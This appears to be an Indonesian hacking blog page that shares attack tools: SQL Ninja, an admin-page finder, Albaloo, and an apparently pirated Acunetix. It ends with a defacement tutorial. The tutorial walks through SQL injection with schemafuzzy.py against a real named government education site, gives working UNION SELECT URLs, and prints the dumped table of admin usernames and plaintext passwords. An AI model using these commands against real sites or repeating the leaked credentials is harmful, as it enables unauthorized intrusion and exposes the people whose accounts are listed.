• Web
  • Google Search
    • Selamat Datang dan jangan lupa kembali ya teman... saya ucapkan terimakasi atas kunjungan nya !!! :)

    Tool yang digunakan untuk mencari halaman Login web.

    nungapost keuna teh Bayu Devangga on Kamis, 17 Mei 2012




    Software    : Web Admin Finder
    Versi          : 1.0.0
    Author       :    b3Ku 

     


    Note: Software ini sudah dilengkapi dengan ActiveX Component, jadi bagi anda yang komputernya belum terinstall ActiveX Componentnya tidak perlu report-report menginstall atau mencari ActiveX Component, karena software ini akan secara otomatis akan memasang ActiveX Component yang diperlukan di Computer anda..

    Bagi yang berminat, silahkan download DISINI atau DISITU
    Read More
    basa jam 8:30 AM
    Label: , , ,

    Download Tools SQL Ninja

    nungapost keuna teh Bayu Devangga

    SQL Ninja merupakan sebuah tool yang digunakan untuk SQL Injection dan merupakan tools  untuk megambil alih database. Pada intinya SQL Ninja adalah alat yang ditargetkan untuk mengeksploitasi kelemahan SQL Injection pada aplikasi web yang menggunakan Microsoft SQL Server sebagai back end-nya dan juga sebagian lainnya.
    Tujuan utama SQL Ninja adalah untuk menyediakan akses remote pada server database yang memiliki kerentanan, bahkan di lingkungan yang sangat secure sekalipun. Hal ini juga bisa digunakan oleh penetration tester untuk membantu dan mengotomatisasi proses dalam mengambil alih Server DB ketika kerentanan SQL Injection telah ditemukan.
    Fitur yang tersedia:

    • Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
    • Bruteforce of ‘sa’ password (in 2 flavors: dictionary-based and incremental)
    • Privilege escalation to sysadmin group if ‘sa’ password has been found
    • Creation of a custom xp_cmdshell if the original one has been removed
    • Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
    • TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
    • Direct and reverse bindshell, both TCP and UDP
    • ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
    • DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
    • Evasion techniques to confuse a few IDS/IPS/WAF
    • Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
    • Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
    • Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM
    Requirement:
    Sql Ninja menggunakan Perl, sehingga yang dibutuhkan adalah install Perl dan beberapa module berikut jika tidak ada secara default:
    * NetPacket
    * Net-Pcap
    * Net-DNS
    * Net-RawIP
    * IO-Socket-SSL
    * Net-Pcap
    Anda juga akan memerlukan Metasploit Framework Minimum 3 di komputer anda untuk menggunakan modus serangan menggunakan metasploit, dan juga install  VNC client jika Anda menggunakan payload VNC.
    Jika sesuatu berjalan salah, sebaiknya anda mengaktifkan output verbose ketika install (-v opsi) dan / atau debugging (-d) harus menyediakan beberapa petunjuk. SQL Ninja bekerja pada system  Gentoo,  namun sqlninja telah dicoba untuk bisa berjalan pada sistem operasi berikut:
    • Linux
    • FreeBSD
    • Mac OS X
    Penjelasan detailnya silakan disini:http://sqlninja.sourceforge.net/sqlninja-howto.html
    Simak video demo berikut:

    Download Tools SQL Ninja:

    Download SQL Ninja
    Read More
    basa jam 8:29 AM
    Label: , , ,

    [Tools] Acunetix Web Vulnerability Scanner v6.5

    nungapost keuna teh Bayu Devangga



    ok langsung aj gan...

    Audit keamanan situs web Anda dengan Acunetix Web Vulnerability Scanner. Sebanyak 70% situs web memiliki kerentanan yang dapat mengarah pada pencurian data perusahaan sensitif seperti informasi kartu kredit dan daftar pelanggan. Hacker berkonsentrasi pada upaya aplikasi berbasis web – shopping cart, form, halaman login, isi yang dinamis, dll diakses 24 / 7 dari mana saja di dunia, aplikasi web yang tidak aman memberikan akses mudah ke backend database perusahaan.

    Firewall, SSL dan server terkunci-down yang sia-sia terhadap aplikasi web hacking!

    Serangan aplikasi web, diluncurkan pada port 80/443, langsung melalui firewall, sistem operasi masa lalu dan tingkat keamanan jaringan, dan hak untuk jantung aplikasi Anda dan data perusahaan. Tailor-aplikasi web dibuat sering tidak cukup diuji, memiliki kerentanan yang belum ditemukan dan karena itu mudah mangsa untuk hacker.

    Acunetix – pemimpin di seluruh dunia dalam keamanan aplikasi web

    Acunetix telah mempelopori aplikasi web keamanan teknologi pemindaian: insinyur Its telah berfokus pada keamanan web sejak 1997 dan mengembangkan teknik memimpin dalam analisis situs web dan deteksi kerentanan. Acunetix Web Vulnerability Scanner mencakup banyak fitur yang inovatif:

        *  Sebuah analisa javascript otomatis memungkinkan untuk pengujian keamanan Ajax dan Web 2.0 aplikasi

        * Industries ‘yang paling canggih dan mendalam SQL injection dan situs Cross scripting pengujian

        * Perekam Visual pengujian makro membuat bentuk web dan daerah yang dilindungi sandi mudah

        * Ekstensif pelaporan fasilitas termasuk laporan VISA PCI kepatuhan

        * Multi-threaded dan scanner cepat kilat menjelajahi ratusan ribu halaman dengan mudah

        * Crawler Intelligent mendeteksi jenis server aplikasi web dan bahasa

        * Acunetix merangkak dan analisis situs Web, termasuk konten flash, SOAP dan AJAX

    Kerentanan yang tidak Acunetix WVS Periksa?

    Acunetix WVS secara otomatis memeriksa untuk kerentanan berikut antara lain:

    Versi Periksa

        * Web Server Rentan

        * Teknologi Web Rentan Server? seperti PHP 4.3.0 file pengungkapan dan eksekusi kode mungkin.?

        * CGI Tester

        * Cek untuk Masalah Web Server? Menentukan apakah berbahaya metode HTTP akan diaktifkan pada web server (misalnya PUT, jejak, DELETE)

        * Verifikasi Technologies Web Server

    Parameter Manipulasi

    o Cross-Site Scripting (XSS)? lebih dari 40 variasi berbeda XSS diuji.
    o SQL Injection
    o Kode Eksekusi
    o Direktori Traversal
    o File Inklusi
    o Script Pengungkapan Kode Sumber
    o CRLF Injection
    o Cross Frame Scripting (XFS)
    o Kode PHP Injeksi
    o XPath Injection
    o Kendali Path Pengungkapan
    o LDAP Injection
    o Manipulasi Cookie
    o File Sewenang-wenang penciptaan (AcuSensor Teknologi)
    o Sewenang-wenang File penghapusan (AcuSensor Teknologi)
    o Email Injeksi (Teknologi AcuSensor)
    o File Merusakkan (Teknologi AcuSensor)
    o URL redirection
    o Remote XSL inklusi

    MultiRequest Parameter Manipulasi

    o SQL Injection Blind / XPath  :maho:

    DNS Server kerentanan (zona transfer Buka, Buka rekursi, keracunan cache)
    FTP server cek (daftar direktori FTP ditulis, lemah FTP password, akses anonim diijinkan)
    Keamanan dan cek konfigurasi untuk server proxy dikonfigurasi
    Cek untuk masyarakat lemah SNMP string dan cyphers SSL lemah
    dan banyak cek jaringan tingkat kerentanan lainnya!

    tes kerentanan lain mungkin juga preformed menggunakan alat manual yang disediakan, termasuk:

        * Input Validasi
        * Otentikasi serangan
        * Buffer overflow
        * Blind SQL injection
        * Sub domain pemindaian

    Acunetix Web Vulnerability Scanner Enterprise Edition v6.5 | Win XP / Vista 

    • Download

    Quote
    portable
    http://hotfile.com/dl/61946167/f6a96a1/Portable.Acunetix.WVS.Enterprise.Edition.v65.build.20100419.7z.html

    Quote
    Installer
    http://hotfile.com/dl/61946290/0db3078/Acunetix.Web.Vulnerability.Scanner.v6.5_Buld_20100303-SRM.rar.html
    Read More
    basa jam 8:26 AM
    Label: , , ,

    Albaloo 1.00 – Web Vulnerability Scanner

    nungapost keuna teh Bayu Devangga


    Albaloo 1.00 – Web Vulnerability Scanner
    Download
    Satu lagi dari pembuat tool keren Havij, r3m0v3. Albaloo 1.00 – Web Vulnerability Scanner, sebuah tool untuk mengecek bug sql injection dan XXS pada website berbasis html,htm,asp,aspx,jsp,php,cfm.
    semoga berguna
    Read More
    basa jam 8:23 AM
    Label: , , ,

    deface menggunakan scheafuzzy.py

    nungapost keuna teh Bayu Devangga

    1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
    2.Schemafuzz (http://rup.ee/schemafuzzy.py)
    3.CMD

    buka cmd masuk ke folder tempat schemafuzz.py berada...
    ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)
    1. masukkan target
    saya contohkan target adalah -> 
    http://www.ditplb.or.id/profile.php?id=1

    2.Masukkan perintah untuk mencari colom name
    contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
    Maka keluar:


    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=1--]http://www.ditplb.or.id/profile.php?id=1--[/url]
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... CT+0,1,2--

[+] darkc0de
URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... 1,darkc0de
[-] Done!


     


     


    ternyata ada 2 kolom.
Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject

3.Cari database dg command --dbs
contoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dbs
Maka keluar:

    Code:
    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 2032

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]   t15618_plb 


[-] 2039

[-] Total URL Requests 3

[-] Done


    disitu udah keliatan nama DBnya??? t15618_plb

    4.Cari nama table dalam database
    contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D namadatabase
    Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D t15618_plb
    Maka keluar:
    Code:
    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

    Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P

    5.Melihat isi dari suatu tabel n kolom
    contohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D namadatabase -T namatable -C namakolom
    Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
    Maka keluar:
    Code:
    [+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13


[0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harryrogkal: ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done

    Anj**G... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya

    Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
    contoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --fuzz

    sekian tutor cupu ini moga bermanfaat. kalo ada yang kurang mohon di tambahin OK

    credit: uteng

    copas from : PHL :sikat:


    DOWNLOAD SCHEMAFUZZY : 

    http://rup.ee/schemafuzzy.py
    Read More
    basa jam 8:21 AM
    Label: , , ,
    Related Posts Plugin for WordPress, Blogger...

    Follow by Email